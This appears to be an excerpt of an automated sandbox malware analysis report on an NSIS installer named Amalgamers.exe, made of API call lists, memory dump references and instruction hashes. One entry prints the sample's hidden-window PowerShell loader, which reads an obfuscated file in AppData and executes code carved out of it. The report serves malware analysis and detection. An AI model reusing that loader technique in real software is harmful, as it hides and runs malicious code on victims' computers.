                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                                        • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                                        • Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                                        • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 00401D45
                                        • GetClientRect.USER32(00000000,?), ref: 00401D52
                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                        • DeleteObject.GDI32(00000000), ref: 00401D90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
                                        • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                                        • Opcode Fuzzy Hash: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
                                        • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                                        • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                                        • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                                        • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
                                        • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                        • Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
                                        • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                        • Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE
                                        APIs
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Close$Enum
                                        • String ID:
                                        • API String ID: 464197530-0
                                        • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                        • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                                        • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                        • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                        • GetTickCount.KERNEL32 ref: 00402D30
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                        • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                                        • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                                        • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                                        • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                                        APIs
                                          • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Topfartens Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                          • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                                          • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                          • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                        • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
                                        • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3248276644-3081826266
                                        • Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                                        • Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
                                        • Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                                        • Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040506A
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                          • Part of subcall function 0040408B: SendMessageA.USER32(00010444,00000000,00000000,00000000), ref: 0040409D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                                        • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                                        • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                                        • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                                        APIs
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Execute: ,?,?,?,?,00000002,Execute: ,?,004060CB,80000002), ref: 00405ECD
                                        • RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Execute: ,Execute: ,Execute: ,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405ED8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Execute:
                                        • API String ID: 3356406503-3756222843
                                        • Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                                        • Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
                                        • Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                                        • Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4
                                        APIs
                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                                        • GlobalFree.KERNEL32(?), ref: 0040375A
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3081826266
                                        • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                        • Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
                                        • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                        • Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Amalgamers.exe,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405985
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Amalgamers.exe,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405993
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                        • Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
                                        • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                        • Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                                        • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                        • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                                        • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                        • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a6207c2277e0f1abd160f1d26cc31658408a902f58f17eedc3a372f4b5df6f6
                                        • Instruction ID: e4aa9097df95c5664aac9554c608968b3a51f4749a3bfe71eb401db2007f8111
                                        • Opcode Fuzzy Hash: 8a6207c2277e0f1abd160f1d26cc31658408a902f58f17eedc3a372f4b5df6f6
                                        • Instruction Fuzzy Hash: 75B15E70E006098FDB28CFA9C9A57DDBBF2AF88314F24C12DD819E7254EB749945CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21a59d0834f704d04244b604a4b3bde6831475a10f81cced90364c337d76f8b0
                                        • Instruction ID: 171acde7b17a374c2a457b4d5fd82a90fcb166941c9bca1396da81b80091896c
                                        • Opcode Fuzzy Hash: 21a59d0834f704d04244b604a4b3bde6831475a10f81cced90364c337d76f8b0
                                        • Instruction Fuzzy Hash: 67215331E006059BDF05CF65D4906AEF7B6BF85304F248629E809FB350DB70E946CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR^q$LR^q
                                        • API String ID: 0-4089051495
